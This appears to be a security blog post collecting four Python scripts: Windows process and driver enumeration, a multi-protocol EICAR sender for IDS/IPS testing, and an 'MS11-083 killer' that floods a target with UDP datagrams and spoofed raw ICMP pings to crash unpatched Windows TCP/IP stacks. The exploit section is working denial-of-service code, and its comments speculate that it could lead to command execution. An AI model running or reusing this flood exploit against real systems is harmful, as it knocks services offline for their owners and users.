
PID Enumeration on Windows with pure python ctypes

The following code enumerates the process IDs on the current system by calling EnumProcesses from psapi.dll on Windows. It should work on the majority of Windows versions that ship psapi.dll in %systemroot%. Note that EnumProcesses returns only PIDs (no names or owners), and that a fixed-size buffer can silently truncate the list when it is filled completely, so a caller should check for that case.


from ctypes import *

# psapi.dll exports EnumProcesses; windll binds it with the stdcall convention.
psapi = windll.psapi

print("[+] PID dumper by Y")
print("[+] contact : If you know me then give me a shout")

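def getListOfProcesses():
    """Print the PID of every process reported by psapi.EnumProcesses.

    The DWORD array is grown and the call repeated whenever EnumProcesses
    fills it completely, because the API gives no other signal that the
    buffer was too small (the original used a fixed 4096 slots and would
    silently truncate).  A failed call raises WinError instead of being
    ignored.
    """
    capacity = 4096
    while True:
        pid_array = (c_ulong * capacity)()  # DWORD[] receiving the PIDs
        bytes_returned = c_ulong(0)         # bytes actually written
        # EnumProcesses returns FALSE on failure; GetLastError has the reason.
        if not psapi.EnumProcesses(byref(pid_array),
                                   sizeof(pid_array),
                                   byref(bytes_returned)):
            raise WinError()
        # A completely filled buffer may hide more processes: retry larger.
        if bytes_returned.value < sizeof(pid_array):
            break
        capacity *= 2
    n_returned = bytes_returned.value // sizeof(c_ulong)
    # Slicing a ctypes array yields a plain list of ints.
    for pid in pid_array[:n_returned]:
        print("[+] Running Process PID %d" % pid)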

# Entry point: dump the PID of every running process.
getListOfProcesses()

IDS/IPS Testing with EICAR

The following script submits the EICAR test string over several protocols and ports so that an IDS/IPS can be checked for alerting on it. It is useful for seeing how well an IDS picks up a known signature as it appears on the wire inside different protocols. Run it only against hosts and listeners you control: EICAR itself is harmless, but the traffic is designed to trip security monitoring.

# IMPORTS
import socket
import httplib,urllib
import ftplib
import telnetlib

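# the EICAR test string; a raw literal because "\P" is not an escape
# sequence and a plain string triggers an invalid-escape warning on newer
# Pythons (the value is byte-for-byte the standard 68-character string)
EICAR = r"X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
############# CONFIGURATION #############
IP = "127.0.0.1"  # host running the listeners (see info())
############# END OF CONF #############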


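def info():
    """Print the banner, the protocol list and the ports each sender uses.

    SMTP was missing from the protocol list although start_test sends it,
    and the setup note said "DIS" where "IDS" was meant; both are fixed.
    """
    print("[+] Multi-Protocol EICAR tester by Y")
    print("[+] contact : If you know me then give me a shout")
    print("[+] Supports - HTTP, FTP, TELNET, SMTP, SSL , TCP , UDP , DNS")
    print("[+] NOTE: Set NC listener on specific ports between the hosts and IDS and watch IDS alerting on protocols")
    print("[+] Following ports are used: 21(TCP),23(TCP),25(TCP),100(UDP),80(TCP),22(TCP),443(TCP),53(UDP)")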

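def sendHTTP(data, target, port):
    """Send *data* to an HTTP listener using HEAD, GET, POST, PUT and DELETE.

    HEAD/GET/PUT/DELETE carry the string in the request path and POST sends
    it as the form field ``eicar``.  Each method gets its own connection:
    httplib refuses a second request on a connection whose response was
    never read (CannotSendRequest), so the original only ever sent HEAD and
    swallowed the other four failures in bare excepts.  Responses are not
    read on purpose -- the intended peer is an nc listener that never
    answers.  The *data* argument is used instead of the module-level EICAR.
    """
    print("[+] Sending HTTP request")
    params = urllib.urlencode({'eicar': data})
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    # (method, url, body, headers); the empty POST url is sent as "/" by httplib.
    probes = [
        ("HEAD", data, None, {}),
        ("GET", data, None, {}),
        ("POST", "", params, headers),
        ("PUT", data, None, {}),
        ("DELETE", data, None, {}),
    ]
    for method, url, body, hdrs in probes:
        print("\t %s" % method)
        try:
            conn = httplib.HTTPConnection(target, port, timeout=4)
        except Exception as e:
            print("[-] Unable to send HTTP data due to : %s" % e)
            return
        try:
            # request() writes the full request before returning.
            conn.request(method, url, body, hdrs)
        except Exception as e:
            print("[-] %s failed: %s" % (method, e))
        finally:
            conn.close()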
    
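def sendFTP(data, target, port):
    """Connect to an FTP listener and send *data* as one raw command line.

    ``putline`` appends CRLF and writes the line without waiting for a
    reply, which suits a plain listener that never answers.  The connection
    is closed on every path; the original leaked it when putline failed.
    """
    try:
        print("[+] Sending FTP request")
        ftp = ftplib.FTP()
        ftp.connect(target, port)  # reads the 220 greeting
    except Exception as e:
        print("[-] Unable to send FTP data due to : %s" % e)
        return
    try:
        ftp.putline(data)  # send single EICAR line
    except Exception as e:
        print("[-] Unable to send FTP data due to : %s" % e)
    finally:
        ftp.close()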
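def sendTelnet(data, target, port):
    """Open a raw Telnet session to target:port and write *data* once.

    Uses the *data* argument (the original ignored it and wrote the global
    EICAR), encodes text to bytes where telnetlib requires it, and always
    closes the session.
    """
    try:
        print("[+] Sending TELNET request")
        tn = telnetlib.Telnet(target, port)
    except Exception as e:
        print("[-] Unable to send TELNET data due to : %s" % e)
        return
    try:
        # Python 3 telnetlib wants bytes; on Python 2 str already is bytes.
        payload = data if isinstance(data, bytes) else data.encode("utf-8")
        tn.write(payload)
    except Exception as e:
        print("[-] Unable to send TELNET data due to : %s" % e)
    finally:
        tn.close()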

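def sendSMTP(data, target, port):
    """Push a minimal SMTP dialogue carrying *data* as the message body.

    Every command is terminated with CRLF and the body with the
    ``<CRLF>.<CRLF>`` end-of-data marker.  The original wrote the commands
    with no line ending at all, so a listener saw them run together on one
    line, and it terminated DATA with "\\n\\t\\n\\t", which no server
    accepts.  Replies are not read because the intended peer is a plain
    listener that may never answer; the session is always closed.
    """
    try:
        print("[+] Sending SMTP request")
        tn = telnetlib.Telnet(target, port)
    except Exception as e:
        print("[-] Unable to send SMTP data due to : %s" % e)
        return
    try:
        dialogue = [
            "HELO localhost",
            "MAIL FROM: root@localhost",
            "RCPT TO: root@localhost",
            "DATA",
            data,
            ".",        # end-of-data marker on a line of its own
            "QUIT",
        ]
        payload = "\r\n".join(dialogue) + "\r\n"
        # Python 3 telnetlib wants bytes; on Python 2 str already is bytes.
        if not isinstance(payload, bytes):
            payload = payload.encode("utf-8")
        tn.write(payload)
    except Exception as e:
        print("[-] Unable to send SMTP data due to : %s" % e)
    finally:
        tn.close()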
    
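def sendSSH(data, target, port):
    """Placeholder for an SSH probe: not implemented, does nothing.

    The second parameter was misspelt ``targer``; it is renamed to match
    the other senders (all call sites are positional).
    """
    return None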

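def sendSSL(data, target, port, context=None):
    """Send *data* to an HTTPS listener with HEAD, GET, POST, PUT and DELETE.

    Same probes as sendHTTP, over TLS.  One connection per method, because
    httplib refuses a second request on a connection whose response was
    never read (CannotSendRequest) -- the original therefore only ever sent
    HEAD.  Responses are not read, since the expected peer is a listener
    that may never answer.  Messages now say HTTPS rather than HTTP.

    context: optional ssl.SSLContext forwarded to HTTPSConnection.  The
    default context verifies the server certificate on Python 2.7.9+/3, so
    a lab listener with a self-signed certificate needs a context of its
    own; do not disable verification outside such a lab.
    """
    print("[+] Sending HTTPS request")
    params = urllib.urlencode({'eicar': data})
    headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
    # (method, url, body, headers); the empty POST url is sent as "/" by httplib.
    probes = [
        ("HEAD", data, None, {}),
        ("GET", data, None, {}),
        ("POST", "", params, headers),
        ("PUT", data, None, {}),
        ("DELETE", data, None, {}),
    ]
    kwargs = {"timeout": 4}
    if context is not None:
        # Only pass it when given: httplib before 2.7.9 has no such keyword.
        kwargs["context"] = context
    for method, url, body, hdrs in probes:
        print("\t %s" % method)
        try:
            conn = httplib.HTTPSConnection(target, port, **kwargs)
        except Exception as e:
            print("[-] Unable to send HTTPS data due to : %s" % e)
            return
        try:
            # The TLS handshake happens here; a non-TLS listener fails it.
            conn.request(method, url, body, hdrs)
        except Exception as e:
            print("[-] %s failed: %s" % (method, e))
        finally:
            conn.close()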
    
def sendICMP(data, target):
    """Stub: ICMP delivery is not implemented (planned as an hping2 wrapper)."""
    return None

def sendRCP(data, target, port):
    """Stub: RPC delivery is not implemented (planned as an hping2 wrapper)."""
    return None

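def sendTCP(data, target, port):
    """Open a TCP connection to target:port, send *data*, close it.

    ``sendall`` is used so the whole payload goes out (``send`` may write
    only a prefix), text is encoded to bytes where needed, and the socket is
    closed on every path.  The 4 second default timeout is still installed
    globally, because start_test calls sendSSL and sendDNS after this and
    they inherit it.
    """
    print("[+] Sending TCP data ")
    socket.setdefaulttimeout(4)
    try:
        payload = data if isinstance(data, bytes) else data.encode("utf-8")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            s.connect((target, int(port)))
            s.sendall(payload)
        finally:
            s.close()
    except Exception as e:
        print("[-] Unable to send TCP data due to : %s" % e)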

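def sendUDP(data, target, port):
    """Fire *data* at target:port in a single UDP datagram.

    The datagram goes out on a throw-away socket that is closed afterwards
    (the original never closed it), text is encoded to bytes where needed,
    and the port is coerced to int so a string port works as in sendTCP.
    """
    print("[+] Sending UDP data ")
    try:
        payload = data if isinstance(data, bytes) else data.encode("utf-8")
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            sock.sendto(payload, (target, int(port)))
        finally:
            sock.close()
    except Exception as e:
        print("[-] Unable to send UDP data due to : %s" % e)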

def sendNETBIOS(data, target, port):
    """Stub: NetBIOS delivery is not implemented (planned as an hping2 wrapper)."""
    return None

def sendDNS(data, target, port):
    """Send *data* to target:port over plain UDP -- no DNS framing.

    This only delegates to sendUDP; the payload is not wrapped in a DNS
    query, so only a signature match on the raw bytes can fire.
    """
    try:
        print("[+] Sending DNS request ")
        sendUDP(data, target, port)  # dirty trick
    except Exception as e:
        # sendUDP reports its own failures, so this mostly guards the print.
        print("%s %s" % ("[-] Unable to send DNS data due to : ", e))


def end():
    """Print the closing reminder once every sender has run."""
    closing = "Done, now review IDS logs for each protocol"
    print(closing)

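def start_test():
    """Run every implemented sender against IP, one protocol per port.

    Ports match the list printed by info(): 21 FTP, 23 Telnet, 25 SMTP,
    100 raw UDP, 80 HTTP, 22 raw TCP, 443 HTTPS and 53 DNS (plain UDP).
    The original issued the DNS probe twice; it now runs once.
    """
    info()

    sendFTP(EICAR, IP, 21)
    sendTelnet(EICAR, IP, 23)
    sendSMTP(EICAR, IP, 25)
    sendUDP(EICAR, IP, 100)
    sendHTTP(EICAR, IP, 80)
    sendTCP(EICAR, IP, 22)
    sendSSL(EICAR, IP, 443)
    sendDNS(EICAR, IP, 53)

    # TODO: sendICMP, sendRCP (445), sendNETBIOS (139) and sendSSH (22) are
    # still stubs, planned as hping2 wrappers, and are not called yet.

    end()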
    
# Run the whole protocol sweep against IP.
start_test()

MS11-083 killer

The following code attempts to trigger MS11-083 by sending a continuous stream of UDP packets to a closed port (the bulletin describes a reference-counter overflow in tcpip.sys; the original "read more here" link did not survive extraction). Keep in mind that it needs on the order of 2^32 datagrams to reach the overflow, that the ICMP stage uses a raw socket and therefore needs administrator rights, and that only systems without the November 2011 patch are affected.

import socket
import threading

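try:
    from dpkt.ip import IP
    from dpkt.icmp import ICMP
except ImportError:
    # Stop here with a clear message instead of failing later with a
    # NameError inside a worker thread when IP()/ICMP() are first used.
    print("install dpkt if you want this program to run!")
    raise SystemExit(1)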


for banner in ("[+] MS11-083 killer by Y",
               "[+] contact : If you know me then give me a shout"):
    print(banner)

############ EDIT THIS #################
UDP_IP = "192.168.93.15"            # target host
UDP_PORT = 839                      # UDP port expected to be closed on the target
MESSAGE = "\x44" * 9 + "\x00" * 6   # 15-byte datagram body
ThreadCount = 32                    # number of sender threads
########################################

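# Echo the configuration back; "lenght" typo in the last line fixed.
print(" [+]UDP target IP: %s" % UDP_IP)
print(" [+]UDP target port: %s" % UDP_PORT)
print(" [+]UDP payload length: %d" % len(MESSAGE))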

def customPing(UDP_IP,repeat):
    # Build one ICMP echo request with a spoofed 1.2.3.4 source and push it
    # through a raw socket ten times.  `repeat` is accepted but never used:
    # the send count is the hard-coded range(10) below.  Raw sockets need
    # administrator/root privileges, and with a spoofed source any reply
    # goes to 1.2.3.4 rather than to this host.
    # craft custom ping
    dataCC = "\xCC\xCC\xCC\xCC\xCC\xCC"
    # NOTE(review): src is 4 packed bytes but dst is the dotted-quad string
    # from the configuration; dpkt's IP header fields are packed 4-byte
    # addresses, so this likely needs socket.inet_aton(UDP_IP) -- confirm.
    ip = IP(src='\x01\x02\x03\x04', dst=UDP_IP, p=1)  # p=1: IPPROTO_ICMP
    icmp = ICMP(type=8, data=ICMP.Echo(id=123, seq=1, data=dataCC))  # type 8: echo request
    ip.data = icmp
    ip.len += len(ip.data)  # total length must cover the ICMP payload
    print "[+] Building socket for final ping"
    # NOTE(review): no protocol is given and IP_HDRINCL is not set, so
    # whether the hand-built IP header is honoured (or a second one is
    # prepended by the stack) depends on the platform -- confirm.
    s = socket.socket(socket.AF_INET, socket.SOCK_RAW)
    s.connect((UDP_IP, 1))
    # sending packet
    print "[+] Sending final ping ( debug trap ) "
    for x in range(10):
        s.send(str(ip))

try:
  print "\t[+] Running UDP attack against -> ", UDP_IP , "on port " , UDP_PORT 
  # One non-blocking UDP socket shared by every sender thread.  With
  # setblocking(0), sendto raises as soon as the kernel send buffer is
  # full; that exception is raised inside run(), which the surrounding
  # try/except does not cover, so it ends that thread with a traceback.
  s = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
  s.setblocking(0) # set non-blocking mode
  class ThreadClass(threading.Thread):
      # Each thread is meant to send its share (2^32 / ThreadCount) of the
      # datagrams and then hand over to customPing().
      def run(self):
          c = 0
          # NOTE(review): c is never incremented in the loop body, so this
          # condition stays true forever and the customPing() call below is
          # never reached.  (Under Python 3 the division yields a float.)
          while c<(4294967296/ThreadCount): # 2^32 requests to overflow the counter

              s.sendto( MESSAGE, (UDP_IP,UDP_PORT ))
          # NOTE(review): the "command execution" remark below is the
          # author's speculation; nothing in this script demonstrates it.
          # trigger the actual attack via ICMP messages ( the payload can probably trigger command execution !?)
          print "[+] Triggering actual attack "
          customPing(UDP_IP,20)

  # Threads are started and never joined; the main thread simply exits
  # its work here while the senders keep running.
  for i in range(ThreadCount):
      t = ThreadClass()
      t.start()
      print "[+] Thread ",i," is starting and its name is : " , t.getName()

except Exception,e:
   print " [-] Exception occured, reason : " , e

Note that this code is for educational purposes only and I do not take responsibility for any misuse.

Dumping Drivers on Windows

Ever wondered how to list all the drivers on your Windows machine? Here is a quick answer in Python that will hopefully help some people. It relies on EnumDeviceDrivers from psapi.dll; keep in mind that the 0x80000000 boundary used to label kernel versus user addresses only holds for 32-bit Windows, and that the buffer sizes handed to the API must match the pointer size of the Python build you run it with.

from ctypes import *
#Windows modules loader
# Windows modules loader
kernel32 = windll.kernel32   # bound for completeness; nothing below calls it
psapi = windll.psapi         # EnumDeviceDrivers / GetDeviceDriver*NameA live here

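class drivers():
    """Enumerate loaded device drivers via psapi.EnumDeviceDrivers.

    Image bases are kept in a c_void_p array so the byte count handed to
    EnumDeviceDrivers matches the element size on both 32- and 64-bit
    Python.  The original used a c_ulong array but advertised
    sizeof(c_void_p) * 1024 bytes, which on 64-bit lets the API write past
    the end of the array; it also wrote driver names into the memory behind
    an immutable Python string (c_char_p("\\x00" * 48)) and passed the
    image base as a bare int, which ctypes truncates to a 32-bit C int.
    """

    # Size of the name/path buffers; MAX_PATH covers the ANSI *Name APIs.
    MAX_PATH = 260

    def getAllDeviceDrivers(self):
        """Print the name, image base and file path of every loaded driver.

        Retries EnumDeviceDrivers with a larger array when it reports that
        more bytes are needed than were offered, and prints the Windows
        error (instead of staying silent) when the call fails.
        """
        capacity = 1024
        while True:
            image_bases = (c_void_p * capacity)()
            needed = c_ulong(0)
            if not psapi.EnumDeviceDrivers(byref(image_bases),
                                           sizeof(image_bases),
                                           byref(needed)):
                print("[-] EnumDeviceDrivers failed: %s" % WinError())
                return
            if needed.value <= sizeof(image_bases):
                break
            capacity = needed.value // sizeof(c_void_p) + 1
        no_drivers = needed.value // sizeof(c_void_p)
        print("[*] EnumDeviceDrivers: %d modules detected" % no_drivers)
        print("\t[+] Dumping all device drivers")
        # Addresses with the top bit set sit in the kernel half of the
        # address space: >= 0x80000000 on 32-bit, >= 0x8000000000000000 on
        # 64-bit -- the original's fixed 32-bit range mislabelled every
        # driver on a 64-bit system.
        kernel_floor = 1 << (8 * sizeof(c_void_p) - 1)
        for baseaddy in image_bases[:no_drivers]:
            # A c_void_p array yields None for NULL slots.
            if not baseaddy:
                continue
            drivername = create_string_buffer(self.MAX_PATH)
            driverpath = create_string_buffer(self.MAX_PATH)
            # Wrap the int: a bare Python int is passed as a 32-bit C int.
            base = c_void_p(baseaddy)
            psapi.GetDeviceDriverBaseNameA(base, drivername, self.MAX_PATH)
            psapi.GetDeviceDriverFileNameA(base, driverpath, self.MAX_PATH)
            kind = "Kernel Driver" if baseaddy >= kernel_floor else "User Driver"
            print("\t\t [-] %s %s is located on 0x%08x load path is %s"
                  % (kind, drivername.value.lower(), baseaddy,
                     driverpath.value.lower()))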

# Instantiate and run.  This rebinds the module-level name `drivers` from
# the class to the instance, so the class is no longer reachable afterwards.
drivers = drivers()
drivers.getAllDeviceDrivers()